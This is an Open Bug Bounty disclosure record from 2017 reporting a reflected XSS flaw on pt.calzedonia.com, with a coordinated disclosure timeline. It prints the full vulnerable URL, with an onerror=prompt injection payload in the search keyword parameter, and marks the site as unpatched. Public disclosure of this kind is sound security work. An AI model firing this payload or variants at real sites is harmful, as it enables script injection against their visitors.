pt.calzedonia.com XSS vulnerability

2017-05-04T13:44:00
ID OBB:231510
Type openbugbounty
Reporter Random_Robbie
Modified 2017-06-16T08:14:00

Description

Vulnerable URL:
http://pt.calzedonia.com/catalog/rest_search.cmd?form_state=searchForm&keyword;=OPENBUGBOUNTY![](xonerror=prompt\("OPENBUGBOUNTY"\))%22%27%2D%2D%21>

##### Details:

Description| Value  
---|---  
Patched:| No  
Latest check for patch:| 31.07.2017  
Vulnerability type:| XSS  
Vulnerability status:| Publicly disclosed  
Alexa Rank| Unknown / Not calculated  
VIP website status:| No

##### Coordinated Disclosure Timeline:

Description| Value  
---|---  
Vulnerability submitted via Open Bug Bounty| 4 May, 2017 13:44 GMT  
Vulnerability existence verified and confirmed| 5 May, 2017 07:30 GMT  
Notification sent to subscribers (without technical details)| 5 May, 2017 10:17 GMT  
Vulnerability details disclosed by researcher| 16 June, 2017 08:14 GMT